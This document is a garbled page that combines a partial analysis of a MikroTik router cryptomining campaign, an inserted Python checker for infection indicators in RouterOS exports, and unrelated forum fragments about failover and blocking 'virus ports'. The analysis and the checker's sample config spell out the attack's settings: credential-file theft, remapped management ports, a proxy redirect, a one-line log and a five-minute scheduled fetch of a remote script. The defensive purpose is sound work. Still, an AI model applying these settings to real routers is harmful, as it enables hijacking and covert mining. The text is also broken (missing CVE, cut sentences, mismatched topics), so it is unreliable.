Virus ports on MikroTik

How is it possible that the same URL displays the real content after 10 milliseconds, and not the miner again? To understand how this works, we need to dive into the configuration of MikroTik routers. We obtained the configuration script that sets up a MikroTik router for this cryptomining campaign.

The infection starts by misusing CVE , a critical vulnerability that allows an attacker to read any file on the router without authorization or user interaction. In this case, the strain targets the file containing the credential database, allowing the attacker to log in to the device.

While this is a serious vulnerability, it cannot be misused unless the attacker can connect to the management interface. Using either the aforementioned vulnerability or weak credentials, the attacker gains access to the router and then executes a multi-stage attack. The first thing the attacker does is place a script on the router. Once there, the script is scheduled to run once every five minutes.

During this stage, a script called i runs. First, the script tries to delete any previously scheduled jobs and scripts running on the router, including rules, schedules, and more. There is quite a long list of script names to kill, which makes us think that this strain has been around for a while and has been modified as more and more jobs were added to its kill list.

Next, it remaps the ports of the TELNET and SSH access protocols to unusual ports, to hinder easy detection and to prevent others from connecting to the administration interface of the router; it also opens these ports to the internet if they are not already open.

As you will see in our analysis, this was not in the original script when the campaign began. The next step is to reset the proxy error page, which is later used for the miner payload, and to enable the web proxy itself.

It also adds a rule to ensure that any additional request to the proxy is denied, and the content of error. This redirects every request from any computer or other device inside the network that passes through the web proxy to an unsecured (HTTP) webpage.

Ok is a very important detail. Keep reading. This is another key line of code for the campaign to work. The two lines of code above tell the router to check every 15 seconds whether a client is connecting to an unsecured (HTTP) page and to redirect the traffic through the proxy just once, because as you are redirected, the IP address of your computer is added to the Ok list for another 15 seconds.

Diagram: an example of how the injection works.

The next line assures us that this is a really malicious script: it sets the logging to keep only the last line of the log.

This is obviously not a good practice for production use, but it allows the bad actor to stay under the radar, so the administrator is not able to see the history of commands in the log files. The following line creates a SOCKS proxy server on a port derived from the router's current time; because it uses the minutes and seconds, the port is effectively random.

The next two lines download a malicious error. The iDDNS script is run every 5 minutes, and contains:
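As an added example (not code from the original article or from MikroTik), here is a Python checker that scans a RouterOS `/export` dump for the configuration indicators described above: management services moved off their default ports, the web proxy enabled with a deny-all access rule, HTTP redirected into the proxy with a 15-second address-list timer, the memory log cut to one line, a SOCKS proxy enabled, and a scheduler job running every five minutes. The sample dump, the list name `Ok`, the port numbers, the script name and the fetch URL are constructed for illustration.

```python
import re
# Constructed RouterOS "/export" sample with the settings discussed above; names, ports and URL are made up.
SAMPLE_EXPORT = """\
/ip service
set telnet port=23231
/ip proxy
set enabled=yes port=8080
/ip proxy access
add action=deny
/ip firewall nat
add chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080
/ip firewall filter
add chain=forward protocol=tcp dst-port=80 action=add-src-to-address-list address-list=Ok address-list-timeout=15s
/system logging action
set memory memory-lines=1
/ip socks
set enabled=yes port=4153
/system scheduler
add name=upd interval=5m on-event="/tool fetch url=http://example.invalid/x.rsc"
"""
RULES = [  # (menu path, key=value pairs that must all match, finding)
    ("/ip proxy", {"enabled": "yes"}, "web proxy enabled"),
    ("/ip proxy access", {"action": "deny"}, "proxy denies every request (error page served instead)"),
    ("/ip firewall nat", {"action": "redirect", "dst-port": "80"}, "plain HTTP redirected into the local proxy"),
    ("/ip firewall filter", {"address-list-timeout": "15s"}, "15-second address-list timer"),
    ("/system logging action", {"memory-lines": "1"}, "memory log keeps only one line"),
    ("/ip socks", {"enabled": "yes"}, "SOCKS proxy enabled"),
    ("/system scheduler", {"interval": "5m"}, "scheduler job runs every 5 minutes"),
]
def parse_export(text):  # (menu path, command) pairs; a line starting with '/' selects the menu
    menu, out = "", []
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("/"):
            menu = line
        elif line and not line.startswith("#"):
            out.append((menu, line))
    return out
def kv(cmd):  # key=value pairs of one command; quoted values are kept whole
    return dict(re.findall(r'(\S+?)=("[^"]*"|\S+)', cmd))
def find_indicators(text):  # one finding per suspicious command, each ending with the raw line
    hits = []
    for menu, cmd in parse_export(text):
        p, words = kv(cmd), cmd.split()
        # telnet/ssh listening on a port other than the default
        if menu == "/ip service" and len(words) > 1 and words[1] in ("telnet", "ssh") and p.get("port") not in (None, "22", "23"):
            hits.append(f"{words[1]} moved to non-default port: {cmd}")
        for rmenu, need, finding in RULES:
            if menu == rmenu and all(p.get(k) == v for k, v in need.items()):
                hits.append(f"{finding}: {cmd}")
    return hits
```

Run it against the output of `/export` taken from a router you administer; every finding quotes the offending line so it can be reviewed and reverted.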

It is assumed that the main link goes through Wireless, with the DSL link as a backup when the main link cannot be used. To check whether the main link is usable or not, the ping command is used. A failover config can also be added, so that if one of the Speedy links goes down, the other Speedy link can be used right away. Or, as another alternative, we split the traffic across the two Speedy links based on network groups in our LAN,

where if nothing is down, both are on at the same time; I think that is load balancing.

Can you upload the script with blocked virus ports from the demo router to the forum or somewhere else?

Thu Jun 16, pm: How do you export them and then import them into another MT box?

Thu Jun 16, pm: A few months ago I already put the full code on the forum.

Thu Jun 16, pm: thx.

Wed Jul 06, pm: Please post the virus-rules list for 2.
Last edited by sergejs on Thu Jul 07, am, edited 1 time in total.

Mon Jul 11, pm: I suppose that p2p programs like eMule, eDonkey or BitTorrent can also use these ports, so that blocking viruses like that can also block the peer-to-peer program.
